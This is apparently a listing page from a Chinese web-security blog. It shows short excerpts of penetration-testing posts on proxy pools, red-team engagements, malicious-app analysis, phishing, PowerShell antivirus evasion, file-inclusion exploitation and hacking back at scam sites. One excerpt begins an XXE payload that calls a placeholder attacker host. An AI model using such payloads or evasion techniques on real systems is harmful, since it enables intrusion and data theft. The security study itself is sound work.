web安全 第25页

2021-03-20hush阅读(847)赞(0)

前言 代理池是渗透测试中常用的工具,用来躲避各种各样的封IP的防火墙,也帮助自身隐藏踪迹。 大部分工具也支持代理选项,但少有支持代理池的.实际上,不需要修改工具去支持代理池,只需要弄一个中间层,在中间层搭建代理池,然后支持代理的工具就可以变...

2021-03-18hush阅读(701)赞(0)

事情是这样的，在某次省hw的时候，对目标进行打点的时候，发现ip下存在四个域名，在一个域名中发现了beifen.zip文件，而网址的功能是一个社区类型的网址。 下载后打开，发现是程序的源码，sql文件都在里面。 找程序中找到的数据库的ip、...

2021-03-15hush阅读(433)赞(0)

确定目标 收集信息 x.x.x.x 首先常规测试方法一顿怼，目录扫描，端口扫描，js文件，中间件，指纹识别，反正该上的都上。。。。 随手加个路径，报错了，当看到这个界面我瞬间就有思路了 为什么这么说呢，因为之前我就碰见过这样的网站报错， 这...

2021-03-14hush阅读(530)赞(0)

记录渗透测试中常见的小Tips。 关于XXE漏洞的一些总结 XXE Payload: <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://attacker_ip:port/...

2021-03-13hush阅读(594)赞(0)

开始 接到任务，分析一恶意APP，涉嫌盗取用户通讯录、短信、定位信息，并对中招用户进行勒索。 分析APP 使用AndriodKiller查看了下APP申请的权限 可以看到基本都是敏感度很高的权限，模拟器中打开APP。 APP除了当前能看到的...

2021-03-12hush阅读(1746)赞(0)

在大型企业边界安全做的越来越好的情况下，不管是 APT 攻击还是红蓝对抗演练，钓鱼和水坑攻击被越来越多的应用。 一、邮件安全的三大协议 1.1 SPF SPF 是 Sender Policy Framework 的缩写，中文译为发送方策略框...

2021-03-10hush阅读(480)赞(0)

今天朋友突然告诉我，某转买手机被骗了1200块钱，心理一惊，果然不出所料，那我来试试吧。。 要来了诈骗网站地址，打开是这种： 果断收集一下信息：（由于留言骗子返还朋友钱款，暂时给他留点面子，打点马赛克） 查看端口，一猜就是宝塔面板搭建， 开...

2021-03-09hush阅读(470)赞(0)

周末在某个CTF群偶然看到这个钓鱼网站：http://gggggg.cn （声明：本文中出现的域名、IP均被替换，并非真实存在，请勿测试），于是开始对该网站进行渗透。观察网站页面，可知这个网站应该是用来盗取QQ账号的。除了域名没有一点迷惑性...

2021-03-06hush阅读(601)赞(0)

前言 在之前发布的一篇 渗透技巧之Powershell实战思路中，学习了powershell在对抗Anti-Virus的方便和强大。团队免杀系列又有了远控免杀从入门到实践(6)-代码篇-Powershell更是拓宽了自己的认知。这里继续学习...

2021-03-05hush阅读(524)赞(0)

1.前言 最近在某个项目上天天挖洞，每天不是什么信息泄露就是xss，没有一个能getshell，愁的不行，感觉头顶都凉飕飕了。不知是早上出门时，没注意踩到狗屎，还是今天运气好，发现一处竟然有文件包含漏洞，百度一波getshell姿势，逐一尝...